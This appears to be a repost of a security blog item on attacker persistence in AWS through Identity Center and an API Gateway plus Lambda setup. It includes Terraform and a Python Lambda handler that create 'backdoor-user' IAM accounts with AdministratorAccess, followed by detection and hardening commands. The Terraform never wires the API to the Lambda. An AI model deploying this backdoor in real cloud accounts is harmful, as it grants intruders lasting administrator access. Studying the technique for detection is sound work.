Listen to this Post

Attackers are evolving their persistence techniques in AWS environments beyond traditional IAM user creation. Two emerging methods include:
- AWS Identity Center (AWS SSO) – Creating a new user, adding them to a group, and attaching a permission set.
- HTTP API Gateway + Lambda – Deploying an API Gateway and Lambda function that generates IAM users when a specific URL is invoked.
This shift suggests that conventional IAM user-based persistence is becoming less effective.
You Should Know:
Reproducing the API Gateway + Lambda Attack
To simulate this persistence technique, use the following Terraform configuration:
resource "aws_api_gateway_rest_api" "malicious_api" {
name = "PersistenceAPI"
description = "Malicious API for IAM user creation"
}
resource "aws_lambda_function" "user_creator" {
filename = "lambda_function.zip"
function_name = "CreateIAMUser"
role = aws_iam_role.lambda_exec.arn
handler = "index.handler"
runtime = "python3.8"
}
resource "aws_iam_role" "lambda_exec" {
name = "lambda_exec_role"
assume_role_policy = jsonencode({
Version = "2012-10-17"
Statement = [{
Action = "sts:AssumeRole"
Effect = "Allow"
Principal = {
Service = "lambda.amazonaws.com"
}
}]
})
}
resource "aws_iam_role_policy_attachment" "lambda_iam_full" {
role = aws_iam_role.lambda_exec.name
policy_arn = "arn:aws:iam::aws:policy/IAMFullAccess"
}
resource "aws_api_gateway_deployment" "deployment" {
rest_api_id = aws_api_gateway_rest_api.malicious_api.id
stage_name = "prod"
}
Lambda Function Code (Python)
import boto3
def handler(event, context):
iam = boto3.client('iam')
username = f"backdoor-user-{event['requestContext']['requestId']}"
iam.create_user(UserName=username)
iam.attach_user_policy(
UserName=username,
PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
)
return {
'statusCode': 200,
'body': f'User {username} created with admin access!'
}
Detection & Mitigation
AWS CLI Commands to Check for Suspicious API Gateways:
aws apigateway get-rest-apis aws lambda list-functions | grep "CreateIAMUser" aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=CreateUser
Linux Command to Monitor AWS API Calls (CloudTrail Logs):
grep -i "CreateUser" /var/log/aws/cloudtrail.log
Hardening Steps
1. Restrict Lambda IAM Permissions:
aws iam list-attached-role-policies --role-name lambda_exec_role
2. Enable GuardDuty for Anomaly Detection:
aws guardduty create-detector --enable
3. Use AWS Config Rules:
aws configservice put-config-rule --config-rule file://restrict-lambda-permissions.json
What Undercode Say
Attackers are leveraging serverless architectures for stealthy persistence. Defenders must:
– Monitor unusual API Gateway deployments
– Restrict Lambda IAM roles to least privilege
– Audit AWS Identity Center (SSO) permission sets
Expected Output:
- Detection of unauthorized API Gateway endpoints
- Alerts on unexpected IAM user creation
- Automated remediation via AWS Config
Prediction
Cloud attacks will increasingly exploit serverless components (Lambda, Step Functions) for persistence, requiring defenders to adopt behavioral detection over static IAM policies.
Relevant URLs:
IT/Security Reporter URL:
Reported By: Adan %C3%A1lvarez – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


